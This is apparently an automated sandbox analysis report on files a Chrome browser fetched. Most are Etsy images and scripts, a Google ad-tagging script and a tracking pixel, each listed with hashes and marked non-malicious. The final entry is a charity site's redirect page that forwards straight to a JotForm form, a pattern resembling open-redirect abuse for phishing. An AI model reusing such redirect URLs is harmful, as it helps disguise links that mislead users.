                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................1t...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma.................1|mdat....."%r...h4 2.b.....1@...T...4..u.s..]...r.`cG.r.T.!..c...j]HG.Ts6..Z.;.M_.s...<....v.!V.u"..`..C..%.WC4........f.13.}.OM...k...0i....^5a..."..6.......c.\....m.....F....f.x...<.x.S*...Y.r...?........[:..v.;....G...:..1 ...p..,*.m.X._....N.5.....'....M...r:....6..e`z.xeoY.=.ugc/i3 .....p.$..y...I.Y..l{e.A...H .{...LN.}_..g.....F....]..G.g.G.v..k....m.`.}....F.B..K....x.D..H...T..!).......Gj.[.[.=......w.a@.u_.Yb....l..{E..."...>.[ ......e...^.(.'.n.x.em~x.;..'..Hs.sj4.X..:.....9..fa......,....j..|h...x_....L;.7.O.Xkb...EL.x.}kWO.)...C.DrL...].......|...&H_...3%*.p@.G8+p&....v.fZ..Zb..%r-$b..z..v.........>...e:..).7.c.V...[v!..q..v'!.c..]AaF.ja..)O..(.e.rr.."..N>2..h._(./.....]JV....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):283709
                                                                                                                                                                              Entropy (8bit):5.5468433667712675
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5EA0DE2BF6F35A21201C4D7BB1295B86
                                                                                                                                                                              SHA1:D44C936D98245FC00955E826A642FAC3B183C188
                                                                                                                                                                              SHA-256:DFADC663F099B27C5F3D0146B9CCE4BBB2F7A819D3081F2D5C0ADC81FD9C08D5
                                                                                                                                                                              SHA-512:BA2B168AA486ED6996600758913DA101197D0E3DE8BCFE2C3202CBA44FCD528D23A4669F35A498CFDBFFFF3C8E20A8656950AC38E1D627568E731B0E1B3F2D8C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/destination?id=AW-658194373&l=dataLayer&cx=c
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-658194373","tag_id":113},{"function":"__ogt_dma","priority":6,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameV
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):96050
                                                                                                                                                                              Entropy (8bit):7.99801131746049
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6058DF548A8E207E585BE495714CA4A8
                                                                                                                                                                              SHA1:98646043C671F00E821C83A16A1FF4F918150EBD
                                                                                                                                                                              SHA-256:949431D402A69C88A17997F70A8CBA1D951CA2222D391EE0586353F4C9744F4E
                                                                                                                                                                              SHA-512:808CB82B3F42E5E182660820DFF9E8FE24F9EE943C7AF2F03E591A1441414BAD276E5D37BA2D40D0503F9A404458B1B8727B1FF43FA3014F911CB93F9D81AA93
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/16846946/r/il/bbd47c/2244861204/il_600x600.2244861204_ntsv.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................v$...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C.Dl.....ispe.......X...X....pixi............ipma.................v,mdat....Y&ey_.....2........A@.U[.q.7.b:yS.Jp?.S...;.....7(.QmT3..0M..q.>....F.{.b.(X..Bw.}>.8F-..y.x.M..1* @..q........D.XZ...}e...5.0..2..X..Z...#|gse?...a.......v;..E.i......(,..^...wd.;.&.NIE..%...#..J.....+F..y..t&q<1a]elq.n$D......sq..1..]~.^.3...j2.e..d..e..._eCb..dZ3F........<E........a.;...6ThiAp..........y..y..z.w...Gx....a..S.I3....>Y.k...b.^`.....(.........[...:...........O.8A..O7K.S.*{I.."T......0.S..c...IRg..Z-E..b.$.......^v....+..H.o.8...|....u=.n|....%.2.n.E.*`..2....y`.D5.)...[.2VBl.....|..I.m+r....V....n..!..Iw>1+.n..oBO....e...X.:.`4.L.sq.9!....0.9....N.NR..v.I...y0._......iqvc..=...].e...H.r.r.q>..C...^......n.2%...5..^.h..[y...#=/L...IhC.0@..>.p9JJE2.p.9.;_......bs[
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):30491
                                                                                                                                                                              Entropy (8bit):7.961574665580785
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:60319D3B6F1383B9C0BC1E53257661A3
                                                                                                                                                                              SHA1:B320FA3445C3A9068CAF39FA1071C193FA61F48E
                                                                                                                                                                              SHA-256:1D32E6FC854C89C32A768E4122E7366FB44409F85B88300BCC6567258183F88C
                                                                                                                                                                              SHA-512:950CF0F83B37D6D3BB6E91105D3B2B5E36F0497E891F9F33D313106BF7905B61C71A8C2068D7375D3163444F9040A83EF8B700590744601FF1A9CD59AA101340
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................F.........................!.1A."Qaq..2..#BR....br...3..$.C..S.4Dcs...................................7......................!..1AQ."aq....2..#B..3R..Cr..$.............?..W....AV.G.@1.:.x....!.g.YV../.J.....N...\#...qeJ01.a.........U.p...t...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):899
                                                                                                                                                                              Entropy (8bit):7.000764144435557
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CDF9B9C80C4164E1DAC3BE94B4A33147
                                                                                                                                                                              SHA1:2312CE6E9EB3BDDEDEB916DA4A379D14038C4989
                                                                                                                                                                              SHA-256:D516C34D41FDDABAE2FAFC843F20AC5BA4F94D439BF58F64D41F53B1C288C2B1
                                                                                                                                                                              SHA-512:4E911D6A84BC74671CF2789E8F56AC64C921E0657E6895DF2EA84F0AF9E271E81D88230F4ED5A61F246BED2913E101E8427B6BF04F52C46850A3888BB4463407
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/c/2429/1718/0/0/il/c61ea5/2481133323/il_50x50.2481133323_7ltf.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................u...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......2...2....pixi............ipma..................}mdat......q.....2......QE..+..(k\....<...J2.`.n.Y....Bn$n..X..nG6/&..A...DR.ny..........M..S.o..D...s=...p..`...,-..C.h..xA..m..-.....$.an.....#%..{..{...V..E......FdT..Ke..=....9.2r..eq}...S..X..#.k'..._.>f.ZokmD..+..4-x..K..3.i....n3..E.....8.....Oi}.`......b`...-.]^.cP.g..2....-...7..EH.S..2,=ou.m........1....I..'.v..\..kY..i...j.6D.Ak..6.r.....vb..$.......?D.C........6X.......h..}...~....O...y.}.....m`..V."(..G.A.t.....M...c..6\C....2v...z.lN.Y....|.....|vfI!.gB-.....c......*!C...9...q.....>....c....B.-..)R...f.'&E..|AS8.O..3.,.J..G....Z$...a.j..8..F....r.4)./!Q..Ur`q00.......e....Yo..h(
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/rum?cm_dsp_id=39&external_user_id=89f49d5a-02e5-4f08-8559-e7dbd8d0ffd8&expiration=1732097284&gdpr=0&gdpr_consent=&C=1
                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32
                                                                                                                                                                              Entropy (8bit):3.9917292966721747
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D4B1D74EA9C2B6AF5B327BE9E334987D
                                                                                                                                                                              SHA1:11D331D5195A27556A65DE87338D9B3F47236F72
                                                                                                                                                                              SHA-256:0E08C082931A74C4B84BAF6382EADB73B729818CB797946C0B0F86F4E34B55E0
                                                                                                                                                                              SHA-512:3F9364B6F7AF95941424800D167919B9307A2B516177D17A83613744DD7F3138D2E49025ACDA77DDF604D8F0B53DAC3365527ABD1E30A0A0A779AB313ECDDF1A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:Cross-Site Requests not allowed!
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):44234
                                                                                                                                                                              Entropy (8bit):7.995049462579252
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C83E6A7E4FC9801AE37847A9220F50D3
                                                                                                                                                                              SHA1:35DF9F4CF74DD0C3D938CE9146FC9E7F5278A4E1
                                                                                                                                                                              SHA-256:F93850CC1D3951134545F7ABFDDC4D82C4B95F4E520514E06238F7B5F8A8B4B6
                                                                                                                                                                              SHA-512:154851EA5EBDB0A7ED7216B5465286EC908AB9196A02FD950FAD552EA064A78E69D5943611C620974979A738A780A05AA8B60124CFB7EA7FDFBDC3E9D609B482
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/4d631f/6053547883/iap_600x600.6053547883_m198mr6b.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2........a@.....A..$...e).9......Z...}h.,...21....S8M..?\TY$.}.>8}j.p}....Iq.D.CA.k.>.._...g..r.-'.....#.W .u'{`..\:$..........V......~..&F...|x.. .jZ.H.......l..=U..z.R.|._Mk.,t.{..W.Y.)k.W!.r/.....+'..n..-.A.YT...M.G..zA..P....kD.[N.5......w...D....).M.^D.}.T..P.6.+.-.K_lS.|....0.wxc.`..z.7."DZhI.\a./w....k...0.By]"."&<..{.v.9e..~1A....w=.V...8.......|=.7j|.0J...C`P..CE...j=.A.T.K....-...b.....3LC?..../.."....GIFt...gg..?a...._..3{)..%3..L.I..T.x.'.Wp...>.....%..}U@..YB..00Y.k.....&.t...A@=../...2...E.#...."W.p.}...@[.^9.F....d.7.N8..k7.....fK79=....$e.a~.u.V/?.Q.)..s.+T*e...vR.9r).uF=.W.g.....DW...:.....x6.P..NE.C!.@....\..9......";h?B....>Z.0..)....|i..i...........B.....eW..f
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):591
                                                                                                                                                                              Entropy (8bit):6.362220999553205
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F83B884A6E98E0612ACD77E8927B4E83
                                                                                                                                                                              SHA1:30CE2B4B231BADA8E81E717176F65BB83A7EC478
                                                                                                                                                                              SHA-256:A6E651121F25A25F81AEFF3B1076DE6F924E29BAF0BFDD347DEF12FD1F8EA019
                                                                                                                                                                              SHA-512:7E04EB7C3CA829441FFB46B71ED03DAE678728173D28D9305F88BD56437730BDF3AEC3457929E04DA6899564F83404FCA925DD576117F7BB809C2B9CA6C12D63
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/2d9174/5055433779/il_50x50.5055433779_18v4.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................A...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......2...2....pixi............ipma..................Imdat......q.....2.....$.E..+J.rf.O...F.v...X...Bu...fG.%.;..k...|t..I...nG....<m.I..}.I0.......h.+_.w..%s9.Y<..*.... .)b..R....>_].<K.L^...#.,."m....^.t.=Y..,Q..`u.....|.B....95@r.%Sp.2.. .....4n..\...7..*y.A..j...G(.$..u.;.......^...0..P?.{.z...oD.........!......-...\....e.U...S&|.n.1.Ga....G..-Cn}...Q...|..z.%?.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):59563
                                                                                                                                                                              Entropy (8bit):7.973776298866404
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8B5DBCA6D91C985244A59AF51E4D2D32
                                                                                                                                                                              SHA1:C22C02D1AF4ADB9D4DA6050CA7579B855A0431B2
                                                                                                                                                                              SHA-256:9DCC7C58EBD5A78EC031EDEE6FEA57F23BF037B2F2114DD58A09AB634B2F200A
                                                                                                                                                                              SHA-512:B8A8C065A05AF315CE2712E1BF1A16824B05B7639053ECE91BF4277D9A04B113592E72880C49D62A9D9EC31505B72D09B5D21BD0512190916FCAE48043F93BE4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................S.........................!1.AQ.."aq2.....#BR..br.$3C......4S.5Dc...%dst..&T.'6....................................H.......................!1..AQ."aq....2...#3BRbr.$4..Cc....%s..5Sd.T...............?...C]......E.. ..B.N#p...Q:...l.BC.\...V..h
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65401)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):330224
                                                                                                                                                                              Entropy (8bit):5.283259960085693
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8E95C4D8776E15097083DD4D66AA1A42
                                                                                                                                                                              SHA1:BC1394A0916D1CB811E6239FC90C1E1B8CA32CC4
                                                                                                                                                                              SHA-256:782D6D1A4FF7CFEE0BD531BD28232E3AB575D0CFA04ABAD3945CB04BB5A61786
                                                                                                                                                                              SHA-512:22E1B972B3731575152250D3414A0A8067A673D96C0755676A23A4C04F9B9F63B7805512588E7D9C22DD7AB2335F1B8A56A15D0AAE2DCF18CD268AC0254A6FA7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/vendor_bundle.051a2557fd322e046abd.js.LICENSE.var vendor_bundle_051a2557fd322e046abd;(()=>{var e={65:e=>{var t=function(e){"use strict";var t=Object.prototype;var r=t.hasOwnProperty;var n;var i="function"===typeof Symbol?Symbol:{};var o=i.iterator||"@@iterator";var a=i.asyncIterator||"@@asyncIterator";var u=i.toStringTag||"@@toStringTag";function s(e,t,r){Object.defineProperty(e,t,{value:r,enumerable:true,configurable:true,writable:true});return e[t]}try{s({},"")}catch(D){s=function(e,t,r){return e[t]=r}}function c(e,t,r,n){var i=t&&t.prototype instanceof y?t:y;var o=Object.create(i.prototype);var a=new j(n||[]);o._invoke=O(e,r,a);return o}e.wrap=c;function l(e,t,r){try{return{type:"normal",arg:e.call(t,r)}}catch(D){return{type:"throw",arg:D}}}var f="suspendedStart";var p="suspendedYield";var d="executing";var v="completed";var h={};function y(){}function m(){}function g(){}var b={};s(b,o,(function
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):47370
                                                                                                                                                                              Entropy (8bit):7.957589582827507
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AA21EF78E83BFB608FD460FFA1D0C00E
                                                                                                                                                                              SHA1:AB57046878F62AF00FEB9AB4EB7DCB10ED1C6A6B
                                                                                                                                                                              SHA-256:3E843A93F303F39FC578B4B60F591055D66B119448A4FBAF198B878A18F0A2ED
                                                                                                                                                                              SHA-512:4221D37E67C95124B86E6CC719A0EA10F59A061F7C7E574B85D83A458484C49CAA3DB3939C924E63F30B0B6EE49028EF27C9DEC75CDB293F61851650F9A94F53
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................D........................!1A.."Qa.q.2.#BR.......b...3r$..%4CES.....................................<.......................!1.A.Qa.."q..2.....B..#R.3b..r..4CS............?..Z....."..!.@a.D.... XB:6.B.............. .Q...@..A.HE1 PB:6..B.K.E1 ...X
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):14853
                                                                                                                                                                              Entropy (8bit):7.922633948055933
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3EAB7AEDA35E29B788451E9729AA6729
                                                                                                                                                                              SHA1:836D3D2D6F70A6D7092FCF2EE5564DD8168EBFD4
                                                                                                                                                                              SHA-256:D67A64ED2F38D00FB79D980C3EC003B19C7F2AFBE08E9EA5F838AC4893115245
                                                                                                                                                                              SHA-512:023FD8F864FECC3B39F24E5C45474FB75B2C02C338CEE841652B111C2BEE8EAEA57A6EB2A6E8A8000F436BFEA976B1A64238A14F150E91A6A93127D272C60961
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.........T.."........................................U.........................!1.AQ."aq..2...#BR....br....$%3E...5CDSUcd....&4t....FTs.........................................................!1..AQa..Bq."2R.#.b..............?..](....w.R.......h..$...n..U.P:&...]..."..].i%.......B...$.PA..4h.......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4090
                                                                                                                                                                              Entropy (8bit):7.609976630551875
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A4F9F585BE8718CAB264C290621179AC
                                                                                                                                                                              SHA1:755017435645768DD78A1DA315638D19F6E6A772
                                                                                                                                                                              SHA-256:988DDB9C933B341B810C625EFF1394E49C4BB6911CA69217F48721469BDD1E60
                                                                                                                                                                              SHA-512:9EFC09E12C22AE6FD976A0F13475F340DB195057B94EE41BBA7DCD5855F2DF12FCA8DE4A6A5D5A102007209F81C3378C0F852236BC199FBA76ACE1D0271D6882
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......d.d..".........................................;..........................!1.."AQa.q..2BR..#$.3CDr..b....................................4........................!1AQa.."q....23BR...#r................?.h.Lb2T..5.m1?I4Nj.....r C..G..yA.>s:...........OPJ..>.z6....:..2_i.<[!.B....BQ.4./....(.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):20197
                                                                                                                                                                              Entropy (8bit):7.985745009812932
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:654DB27614F8729B52C17793B59ACEE9
                                                                                                                                                                              SHA1:C3E3816CB8E2DA108EE1F24DB97980A3CF94E6FA
                                                                                                                                                                              SHA-256:1DB4BBEE9B2DAAD1D7E949843E5B32599CBBD5325A88A2FECF72DC9409D4930A
                                                                                                                                                                              SHA-512:2D2789CBEAAF3104870267C42AAD94B1B384427D1A5BE9330025E36F7FD948BC85B51430822CEBC1EAFDC2720D8AC7F8F2573700872B889AE2260B84BF327C0D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/50339968/c/2000/2000/0/580/il/fb0d54/5799199656/il_600x600.5799199656_ey5k.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................M....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................M.mdat.....&ey_.....2...P...A@..B.lc.Od ..@..S+.X\.?....5......M...y.1.B...D).,.w.../.M...C.w)..|..z."...u.=-...m.......N.......B<}.....-.....T....Q*<%.g..0...[P..?.....=..]!..xWP.c...K#.pqN...S.=?...d....-u2.q.Z......O+]fGg.R..\.l.|.xe._.'.w...@n.NqY<./.C.s.k....q.1...\.X=b...89.~...)......&.M.. ....l.%.<.6....^.N:.o.7?.@..x.0...L..(g.....C.>of...q...u.$.{n.7..N.j.(.Q......HCe.n......#.j>.^....v.B[.:F.!..0-;...h....KB..E~..=|8.....deT.........k+..9T.]9.T......@*.....|)L.....<..-..Sq.}.m.E......M..F.L%g..?.....B.y.U ..#.5.M...._{........W..v...}T.y.hy{..*E.d(W.@...|r.)e..55.V0.T.M.ut..%.+.|.E6.4u./......9..f../.'.Q~..>|.B..z$.......u.y...[.O..a4...f..pI....R.%.Q.....E]K..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16805
                                                                                                                                                                              Entropy (8bit):7.930938991546891
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7F7530AAAEEC8214E3912E6E69B7F94C
                                                                                                                                                                              SHA1:4C962CBC61A84F8D4F111BA49C38EEAE24B50A1D
                                                                                                                                                                              SHA-256:AD9B6DD817258197641A2E72A4799C74C46124A78E1E1472E9E239C771DC2D24
                                                                                                                                                                              SHA-512:029A653C2185FA730C0A6EFA2EFBC21132717171CE394E9D417755E2FB6070B939361AE34FE1FE70A622F378163CF44DB601AC6A201BDE6944CE85A47FBB8DAF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.........T..".........................................>.........................!1A..Qa"2q..B...#R...br..$3C....S..................................0......................!1.A..Qaq"...2..#BR3Cr..............?.....j..q.C.t).T(Q....tF....*`...h.....T.(P.E.(...Qb...C.Q...EGB.....>...(S.Q.Q.B......P.F(
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):85
                                                                                                                                                                              Entropy (8bit):4.9681733659727865
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:EC819CCF13A87687D8E425D5858A5620
                                                                                                                                                                              SHA1:1B4CA99125980F4DB5867B5084DC168B03424FE5
                                                                                                                                                                              SHA-256:DFFFCB70DE3D806B6306A05846CE91EF73845485E0C78B1B4B4A63F34113ECD4
                                                                                                                                                                              SHA-512:A983A9CBB4DD1DBE7FB7DDCC61D9B2EDC414F6593E185F5C5A6CEB2C2DB717EA6ABE30421F6C4DF8BCD72C7B66B472192D5A1B07EDCE8C306CCAFC35AA82A471
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059
                                                                                                                                                                              Preview:<meta http-equiv='Refresh' content='0; url=https://form.jotform.com/242923371946059'>
